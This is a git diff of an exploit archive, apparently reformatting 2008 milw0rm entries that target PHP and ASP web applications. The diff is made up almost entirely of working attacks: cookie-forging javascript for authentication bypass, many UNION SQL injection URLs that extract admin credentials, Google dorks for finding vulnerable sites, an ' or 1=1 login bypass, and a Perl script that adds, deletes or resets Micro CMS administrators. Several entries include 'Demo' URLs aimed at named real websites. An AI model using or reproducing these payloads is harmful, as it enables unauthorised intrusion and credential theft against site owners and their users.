+javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/";
+
+user: 
+
+javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/";
+
+for demo admin: ( user_id: 1)
+
+javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";
+
+for demo user: ( for user zorlu user_id: 6 )
+
+javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/";
+
+for demo user: ( for user demo user_id: 2 )
+
+javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6930.txt b/platforms/php/webapps/6930.txt
index 90d34c45c..6d7bdd5df 100755
--- a/platforms/php/webapps/6930.txt
+++ b/platforms/php/webapps/6930.txt
@@ -1,32 +1,32 @@
-                                    # Bl@ckbe@rD ('Tunisian TerrorisT') #
-                                         # ===================== #
------------------------------------------------------------------------------------
-
-[+] Script Name   : Asp Forum v1.0 Rem0te SQL Injection EXploit
-
-[+] Author          : Bl@ckbe@rD ('Tunisian TerrorisT')
-
-[+] Contact         : blackbeard-sql[A.T]hotmail{.}fr
-
-[+] Home           : http://www.underz0ne.org
-
-[+] Dork             : http://www.google.com
-
-http://www.google.com/search?q=%22ASP+Forum+v1.0+-+Powered+by+GO4I.NET++-%22+++inurl:forums.asp%3FiFor%3D&
-
-hl=fr&lr=&client=firefox-a&rls=org.mozilla:fr:official&hs=ELg&
-
-filter=0 
-
---//-->
-
-[+] Expl0iT :
-
-http://www.site.xx/forum/forum.asp?iFor={sql}
-
-http://www.site.xx/forum/forum.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
---//-->
-
-[+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew...
-
-# milw0rm.com [2008-11-01]
+                                    # Bl@ckbe@rD ('Tunisian TerrorisT') #
+                                         # ===================== #
+-----------------------------------------------------------------------------------
+
+[+] Script Name   : Asp Forum v1.0 Rem0te SQL Injection EXploit
+
+[+] Author          : Bl@ckbe@rD ('Tunisian TerrorisT')
+
+[+] Contact         : blackbeard-sql[A.T]hotmail{.}fr
+
+[+] Home           : http://www.underz0ne.org
+
+[+] Dork             : http://www.google.com
+
+http://www.google.com/search?q=%22ASP+Forum+v1.0+-+Powered+by+GO4I.NET++-%22+++inurl:forums.asp%3FiFor%3D&
+
+hl=fr&lr=&client=firefox-a&rls=org.mozilla:fr:official&hs=ELg&
+
+filter=0 
+
+--//-->
+
+[+] Expl0iT :
+
+http://www.site.xx/forum/forum.asp?iFor={sql}
+
+http://www.site.xx/forum/forum.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
+--//-->
+
+[+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew...
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6931.txt b/platforms/php/webapps/6931.txt
index fac45d878..f079ca0f1 100755
--- a/platforms/php/webapps/6931.txt
+++ b/platforms/php/webapps/6931.txt
@@ -1,31 +1,31 @@
-||| Programs Rating (details.php id ) Remote SQL Injection Vulnerability
-
-||    Author: Hussin X
-
-||   Home :  WwW.IQ-TY.CoM
-
-||    email:  darkangel_g85[at]Yahoo[DoT]com
-
-
-||| script :http://www.yourfreeworld.com/script/rating.php
-
-||| DorK   : *_^
-
-
- Exploit
-________
-
-www.[target].com/Script/details.php?id=-1+union+select+1,version(),3,user(),0x48757373696E5F585F5F5761735F68657265,6,7,8,9,10--
-
-
- Demo
-_________
-
-http://www.downlinegoldmine.com/rating/details.php?id=-1+union+select+1,version(),3,user(),0x48757373696E5F585F5F5761735F68657265,6,7,8,9,10--
-
-
-
-
-| Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+||| Programs Rating (details.php id ) Remote SQL Injection Vulnerability
+
+||    Author: Hussin X
+
+||   Home :  WwW.IQ-TY.CoM
+
+||    email:  darkangel_g85[at]Yahoo[DoT]com
+
+
+||| script :http://www.yourfreeworld.com/script/rating.php
+
+||| DorK   : *_^
+
+
+ Exploit
+________
+
+www.[target].com/Script/details.php?id=-1+union+select+1,version(),3,user(),0x48757373696E5F585F5F5761735F68657265,6,7,8,9,10--
+
+
+ Demo
+_________
+
+http://www.downlinegoldmine.com/rating/details.php?id=-1+union+select+1,version(),3,user(),0x48757373696E5F585F5F5761735F68657265,6,7,8,9,10--
+
+
+
+
+| Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6932.txt b/platforms/php/webapps/6932.txt
index f986c663d..7137e2c9e 100755
--- a/platforms/php/webapps/6932.txt
+++ b/platforms/php/webapps/6932.txt
@@ -1,24 +1,24 @@
-###########################################################################
-      ______    __  __   ______          __                ______                   
-     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
-    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
-   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
-  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
-        /____/                                           
-
-# Discovered by : Hakxer
-# Type Gap : Auth Bypass
-# Script : AJ ARTICLE 
-# Greetz : Allah , Egyptian x hacker , Br1ght D@rk 
-##########################################################################
-
-# [~] First Go to http://www.ajsquare.com/products/demo/admin/index.php
-# [~] In username Write : admin ' or ' 1=1
-# [~] In Password Any thing : Hakxer
-# [~] Click Login ..! you in panel
-		
-
-# Proud To be a Muslim #
-#_=END=_#
-
-# milw0rm.com [2008-11-01]
+###########################################################################
+      ______    __  __   ______          __                ______                   
+     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
+    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
+   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
+  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
+        /____/                                           
+
+# Discovered by : Hakxer
+# Type Gap : Auth Bypass
+# Script : AJ ARTICLE 
+# Greetz : Allah , Egyptian x hacker , Br1ght D@rk 
+##########################################################################
+
+# [~] First Go to http://www.ajsquare.com/products/demo/admin/index.php
+# [~] In username Write : admin ' or ' 1=1
+# [~] In Password Any thing : Hakxer
+# [~] Click Login ..! you in panel
+		
+
+# Proud To be a Muslim #
+#_=END=_#
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6933.pl b/platforms/php/webapps/6933.pl
index 273aa80a0..b4088ff06 100755
--- a/platforms/php/webapps/6933.pl
+++ b/platforms/php/webapps/6933.pl
@@ -1,130 +1,130 @@
-#!/usr/bin/perl
-# --------------------------------------------------------------
-# Micro CMS <= 0.3.5 Remote (Add/Delete/Password Change) Exploit
-# StAkeR[at]hotmail[dot]it
-# http://www.impliedbydesign.com/apps/microcms/microcms.zip
-# --------------------------------------------------------------
-
-use strict;
-use LWP::UserAgent;
-
-my ($admin,$passwd);
-my @real = undef;
-my $http = new LWP::UserAgent; 
-my ($host,$path,$tell) = @ARGV;
-
-if($host !~ /http:\/\/(.+?)$/i || $tell !~ /^\-(delete|change|add)?$/i)
-{
-  print STDOUT "[+] Micro CMS <= 0.3.5 Remote (Add/Delete/Password Change) Exploit\n";
-  print STDOUT "[+] Usage: perl $0 http://[host] [path] -option (-delete,-change,-add)\n";
-  exit;
-}
-
-
-if($tell =~ /delete/i)
-{
-  print STDOUT "[+]Admin ID: ";
-  chomp($admin = );
-  
-  if(defined $admin)
-  {
-    print STDOUT del_admin($admin);
-    exit;
-  }
-  else
-  {
-    print STDOUT "[+] Not Defined!\n";
-    exit;
-  }
-}
-
-if($tell =~ /change/i)
-{
-  print STDOUT "[+] Admin ID : ";
-  chomp($admin = );
-  
-  print STDOUT "[+] New Password: ";
-  chomp($passwd = );
-  
-  if(defined $admin || defined($passwd))
-  {
-    print STDOUT change_pwd($admin,$passwd);
-  }
-  else
-  {
-    print STDOUT "[+] Not Defined!\n";
-  }
-}
-
-if($tell =~ /add/i)
-{
-  print STDOUT "[+] Admin Username: ";
-  chomp($admin = );
-  
-  print STDOUT "[+] Admin Password: ";
-  chomp($passwd = );
-  
-  if(defined $admin || defined($passwd))
-  {
-    print STDOUT add_admin($admin,$passwd);
-  }
-  else
-  {
-    print STDOUT "[+] Not Defined!\n";
-  }
-}
-
-
-sub change_pwd
-{
-  my ($userid,$passwd) = @_;
- 
-  my $post = {
-               action                  => 'change_password',
-               administrators_id       => $userid,
-               administrators_password => $passwd,
-            };
-          
-  $http->post($host.'/'.$path.'/microcms-admin-home.php',$post);
-   
-  return "[+] Password Changed! ($passwd)\n";
-
-}
-
-
-sub del_admin
-{
-  my $userid = shift @_;
- 
-  my $post = {
-               action                  => 'delete_admin',
-               administrators_id       => $userid,
-            };
-          
-  $http->post($host.'/'.$path.'/microcms-admin-home.php',$post);
-   
-  return "[+] Admin ($userid) Has Been Deleted!\n";
-
-}
-
-
-sub add_admin
-{
-  my ($username,$password) = @_;
-  my $level = 1;
- 
-  my $post = {
-               action                  => 'add_admin',
-               administrators_name     => $username,
-               administrators_username => $username,
-               administrators_password => $password,
-               administrators_email    => $username,
-               administrators_level    => $level,
-            };
-          
-  $http->post($host.'/'.$path.'/microcms-admin-home.php',$post);
-   
-  return "[+] Username: $username and Password: $password\n";
-}    
-
-# milw0rm.com [2008-11-01]
+#!/usr/bin/perl
+# --------------------------------------------------------------
+# Micro CMS <= 0.3.5 Remote (Add/Delete/Password Change) Exploit
+# StAkeR[at]hotmail[dot]it
+# http://www.impliedbydesign.com/apps/microcms/microcms.zip
+# --------------------------------------------------------------
+
+use strict;
+use LWP::UserAgent;
+
+my ($admin,$passwd);
+my @real = undef;
+my $http = new LWP::UserAgent; 
+my ($host,$path,$tell) = @ARGV;
+
+if($host !~ /http:\/\/(.+?)$/i || $tell !~ /^\-(delete|change|add)?$/i)
+{
+  print STDOUT "[+] Micro CMS <= 0.3.5 Remote (Add/Delete/Password Change) Exploit\n";
+  print STDOUT "[+] Usage: perl $0 http://[host] [path] -option (-delete,-change,-add)\n";
+  exit;
+}
+
+
+if($tell =~ /delete/i)
+{
+  print STDOUT "[+]Admin ID: ";
+  chomp($admin = );
+  
+  if(defined $admin)
+  {
+    print STDOUT del_admin($admin);
+    exit;
+  }
+  else
+  {
+    print STDOUT "[+] Not Defined!\n";
+    exit;
+  }
+}
+
+if($tell =~ /change/i)
+{
+  print STDOUT "[+] Admin ID : ";
+  chomp($admin = );
+  
+  print STDOUT "[+] New Password: ";
+  chomp($passwd = );
+  
+  if(defined $admin || defined($passwd))
+  {
+    print STDOUT change_pwd($admin,$passwd);
+  }
+  else
+  {
+    print STDOUT "[+] Not Defined!\n";
+  }
+}
+
+if($tell =~ /add/i)
+{
+  print STDOUT "[+] Admin Username: ";
+  chomp($admin = );
+  
+  print STDOUT "[+] Admin Password: ";
+  chomp($passwd = );
+  
+  if(defined $admin || defined($passwd))
+  {
+    print STDOUT add_admin($admin,$passwd);
+  }
+  else
+  {
+    print STDOUT "[+] Not Defined!\n";
+  }
+}
+
+
+sub change_pwd
+{
+  my ($userid,$passwd) = @_;
+ 
+  my $post = {
+               action                  => 'change_password',
+               administrators_id       => $userid,
+               administrators_password => $passwd,
+            };
+          
+  $http->post($host.'/'.$path.'/microcms-admin-home.php',$post);
+   
+  return "[+] Password Changed! ($passwd)\n";
+
+}
+
+
+sub del_admin
+{
+  my $userid = shift @_;
+ 
+  my $post = {
+               action                  => 'delete_admin',
+               administrators_id       => $userid,
+            };
+          
+  $http->post($host.'/'.$path.'/microcms-admin-home.php',$post);
+   
+  return "[+] Admin ($userid) Has Been Deleted!\n";
+
+}
+
+
+sub add_admin
+{
+  my ($username,$password) = @_;
+  my $level = 1;
+ 
+  my $post = {
+               action                  => 'add_admin',
+               administrators_name     => $username,
+               administrators_username => $username,
+               administrators_password => $password,
+               administrators_email    => $username,
+               administrators_level    => $level,
+            };
+          
+  $http->post($host.'/'.$path.'/microcms-admin-home.php',$post);
+   
+  return "[+] Username: $username and Password: $password\n";
+}    
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6934.txt b/platforms/php/webapps/6934.txt
index 44a27fd14..71f7f9731 100755
--- a/platforms/php/webapps/6934.txt
+++ b/platforms/php/webapps/6934.txt
@@ -1,35 +1,35 @@
-========================================================
-
-==> Shahrood (ndetail.php id) Blind SQL Injection Vulnerability
-
-========================================================
-
-==> AuThOr : BazOka-HaCkEr
-
-==> EmaiL    : x9j@hotmail.com
-
-==> HomE    :  www.TrYaG.cc/cc
-
-========================================================
-
-==> Product Page :
-
-==> http://www.shahrood.net/
-
-==> ExplO!te :
-
-==> www.TarGeT.com/ndetail.php?id=[SQL]
- 
-==> Example :
-
-==> www.shahvar.ir/ndetail.php?id=24+AND+SUBSTRING(@@version,1,1)=5
-
-=========================================================
-
-==> GreeTz :
-
-==> FeezO , Abu-Mahdi , MoGaTiL , Mr.Al7rbi , Str0ke , TrYaG TeaM
-
-=========================================================
-
-# milw0rm.com [2008-11-01]
+========================================================
+
+==> Shahrood (ndetail.php id) Blind SQL Injection Vulnerability
+
+========================================================
+
+==> AuThOr : BazOka-HaCkEr
+
+==> EmaiL    : x9j@hotmail.com
+
+==> HomE    :  www.TrYaG.cc/cc
+
+========================================================
+
+==> Product Page :
+
+==> http://www.shahrood.net/
+
+==> ExplO!te :
+
+==> www.TarGeT.com/ndetail.php?id=[SQL]
+ 
+==> Example :
+
+==> www.shahvar.ir/ndetail.php?id=24+AND+SUBSTRING(@@version,1,1)=5
+
+=========================================================
+
+==> GreeTz :
+
+==> FeezO , Abu-Mahdi , MoGaTiL , Mr.Al7rbi , Str0ke , TrYaG TeaM
+
+=========================================================
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6935.txt b/platforms/php/webapps/6935.txt
index 5c1bb3a6a..89ccdf50e 100755
--- a/platforms/php/webapps/6935.txt
+++ b/platforms/php/webapps/6935.txt
@@ -1,32 +1,31 @@
-
-Downline Builder( id ) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    : http://www.yourfreeworld.com/script/downlinebuilder.php
-
-DorK   : inurl:tr.php?id= Downline
-
-Exploit :
-_______
-
-tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-Demo :
-_______
-
-http://www.downlinegoldmine.com/downlinebuilder/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+Downline Builder( id ) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    : http://www.yourfreeworld.com/script/downlinebuilder.php
+
+DorK   : inurl:tr.php?id= Downline
+
+Exploit :
+_______
+
+tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+Demo :
+_______
+
+http://www.downlinegoldmine.com/downlinebuilder/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6936.txt b/platforms/php/webapps/6936.txt
index bb0d1324a..ac42b04db 100755
--- a/platforms/php/webapps/6936.txt
+++ b/platforms/php/webapps/6936.txt
@@ -1,31 +1,30 @@
-
- Banner Management (id) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    : http://www.yourfreeworld.com/script/bannermanagementscript.asp
-
-DorK   : :)
-
-Exploit :
-_______
-
-tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13--
-
-
-Demo :
-_______
-
-http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13--
-
-
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+ Banner Management (id) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    : http://www.yourfreeworld.com/script/bannermanagementscript.asp
+
+DorK   : :)
+
+Exploit :
+_______
+
+tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13--
+
+
+Demo :
+_______
+
+http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13--
+
+
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6937.txt b/platforms/php/webapps/6937.txt
index 6d159236f..6f3d6dd2e 100755
--- a/platforms/php/webapps/6937.txt
+++ b/platforms/php/webapps/6937.txt
@@ -1,36 +1,35 @@
-
-Blog Blaster( id ) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    : http://www.yourfreeworld.com/script/blogblaster.php
-
-DorK   : :)
-
-Exploit :
-_______
-
-tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-Demo :
-_______
-
-http://www.downlinegoldmine.com/blogblaster/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-Admin Login :
-_______
-/admin/
-
-
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+Blog Blaster( id ) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    : http://www.yourfreeworld.com/script/blogblaster.php
+
+DorK   : :)
+
+Exploit :
+_______
+
+tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+Demo :
+_______
+
+http://www.downlinegoldmine.com/blogblaster/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+Admin Login :
+_______
+/admin/
+
+
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6938.txt b/platforms/php/webapps/6938.txt
index ec57c6aaf..2d3836a3b 100755
--- a/platforms/php/webapps/6938.txt
+++ b/platforms/php/webapps/6938.txt
@@ -1,31 +1,30 @@
-
-Autoresponder Hosting ( id ) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    :http://www.yourfreeworld.com/script/autoresponderhosting.php
-
-DorK   : inurl:tr.php?id= Autoresponder
-
-Exploit :
-_______
-
-tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-Demo :
-_______
-
-http://www.downlinegoldmine.com/autoresponderhosting/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+Autoresponder Hosting ( id ) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    :http://www.yourfreeworld.com/script/autoresponderhosting.php
+
+DorK   : inurl:tr.php?id= Autoresponder
+
+Exploit :
+_______
+
+tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+Demo :
+_______
+
+http://www.downlinegoldmine.com/autoresponderhosting/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6939.txt b/platforms/php/webapps/6939.txt
index 76c7b6ead..189321344 100755
--- a/platforms/php/webapps/6939.txt
+++ b/platforms/php/webapps/6939.txt
@@ -1,33 +1,32 @@
-
-Forced Matrix Script ( id ) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    : http://www.yourfreeworld.com/script/subscriptionforcedmatrix.php
-
-DorK   : inurl:"tr1.php?id=" Forced Matrix
-
-Exploit :
-_______
-
-tr1.php?id=-19+union+select+1,2,3,password,5,6,7,8,9,10+from+adminsettings--
-
-
-
-
-Demo :
-_______
-
-http://www.autowebhits.com/subscriptionforcedmatrixt/tr1.php?id=-19+union+select+1,2,3,password,5,6,7,8,9,10+from+adminsettings--
-
-
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+Forced Matrix Script ( id ) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    : http://www.yourfreeworld.com/script/subscriptionforcedmatrix.php
+
+DorK   : inurl:"tr1.php?id=" Forced Matrix
+
+Exploit :
+_______
+
+tr1.php?id=-19+union+select+1,2,3,password,5,6,7,8,9,10+from+adminsettings--
+
+
+
+
+Demo :
+_______
+
+http://www.autowebhits.com/subscriptionforcedmatrixt/tr1.php?id=-19+union+select+1,2,3,password,5,6,7,8,9,10+from+adminsettings--
+
+
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6940.txt b/platforms/php/webapps/6940.txt
index 9c81ccb51..c9848cc37 100755
--- a/platforms/php/webapps/6940.txt
+++ b/platforms/php/webapps/6940.txt
@@ -1,32 +1,31 @@
-
-Short Url & Url Tracker ( id ) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    : http://www.yourfreeworld.com/script/shorturl.php
-
-DorK   :  inurl:"tr.php?id=" Short Url & Url Tracker
-
-Exploit :
-_______
-
-tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-Demo :
-_______
-
-
-http://www.safelistadtrading.com/shorturl/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+Short Url & Url Tracker ( id ) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    : http://www.yourfreeworld.com/script/shorturl.php
+
+DorK   :  inurl:"tr.php?id=" Short Url & Url Tracker
+
+Exploit :
+_______
+
+tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+Demo :
+_______
+
+
+http://www.safelistadtrading.com/shorturl/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6941.txt b/platforms/php/webapps/6941.txt
index e2b78bd5a..f31ba4782 100755
--- a/platforms/php/webapps/6941.txt
+++ b/platforms/php/webapps/6941.txt
@@ -1,33 +1,32 @@
-
-Viral Marketing ( id ) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    : http://www.yourfreeworld.com/script/viralmarketing.php
-
-DorK   : Copyright © Viral Marketing 2008
-
-Exploit :
-_______
-
-tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-Demo :
-_______
-
-http://www.downlinegoldmine.com/viralmarketing/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-
-
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+Viral Marketing ( id ) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    : http://www.yourfreeworld.com/script/viralmarketing.php
+
+DorK   : Copyright © Viral Marketing 2008
+
+Exploit :
+_______
+
+tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+Demo :
+_______
+
+http://www.downlinegoldmine.com/viralmarketing/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+
+
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6942.txt b/platforms/php/webapps/6942.txt
index af55379d8..d805afbea 100755
--- a/platforms/php/webapps/6942.txt
+++ b/platforms/php/webapps/6942.txt
@@ -1,33 +1,32 @@
-
-Scrolling Text Ads ( id ) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    : http://www.yourfreeworld.com/script/scrollingads.php
-
-DorK   :  inurl:"tr1.php?id="
-
-Exploit :
-_______
-
-tr1.php?id=-19+union+select+1,2,3,4,concat(0x3a,Username,0x3a,Password),6,7,8,9,10,11,12,13,14,15+from+adminsettings--
-
-
-
-Demo :
-_______
-
-
-http://www.downlinegoldmine.com/scrollingtextads/tr1.php?id=-19+union+select+1,2,3,4,concat(0x3a,Username,0x3a,Password),6,7,8,9,10,11,12,13,14,15+from+adminsettings--
-
-
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+Scrolling Text Ads ( id ) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    : http://www.yourfreeworld.com/script/scrollingads.php
+
+DorK   :  inurl:"tr1.php?id="
+
+Exploit :
+_______
+
+tr1.php?id=-19+union+select+1,2,3,4,concat(0x3a,Username,0x3a,Password),6,7,8,9,10,11,12,13,14,15+from+adminsettings--
+
+
+
+Demo :
+_______
+
+
+http://www.downlinegoldmine.com/scrollingtextads/tr1.php?id=-19+union+select+1,2,3,4,concat(0x3a,Username,0x3a,Password),6,7,8,9,10,11,12,13,14,15+from+adminsettings--
+
+
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6943.txt b/platforms/php/webapps/6943.txt
index 6a7c06b4c..65b2ce1a9 100755
--- a/platforms/php/webapps/6943.txt
+++ b/platforms/php/webapps/6943.txt
@@ -1,34 +1,33 @@
-
-Reminder Service ( id ) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    : http://www.yourfreeworld.com/script/reminder.php
-
-DorK   :  inurl:tr.php?id= Reminder Service
-
-Exploit :
-_______
-
-tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-
-Demo :
-_______
-
-
-http://www.downlinegoldmine.com/reminderservice/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+Reminder Service ( id ) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    : http://www.yourfreeworld.com/script/reminder.php
+
+DorK   :  inurl:tr.php?id= Reminder Service
+
+Exploit :
+_______
+
+tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+
+Demo :
+_______
+
+
+http://www.downlinegoldmine.com/reminderservice/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6944.txt b/platforms/php/webapps/6944.txt
index 2e007e218..19d8b2cfc 100755
--- a/platforms/php/webapps/6944.txt
+++ b/platforms/php/webapps/6944.txt
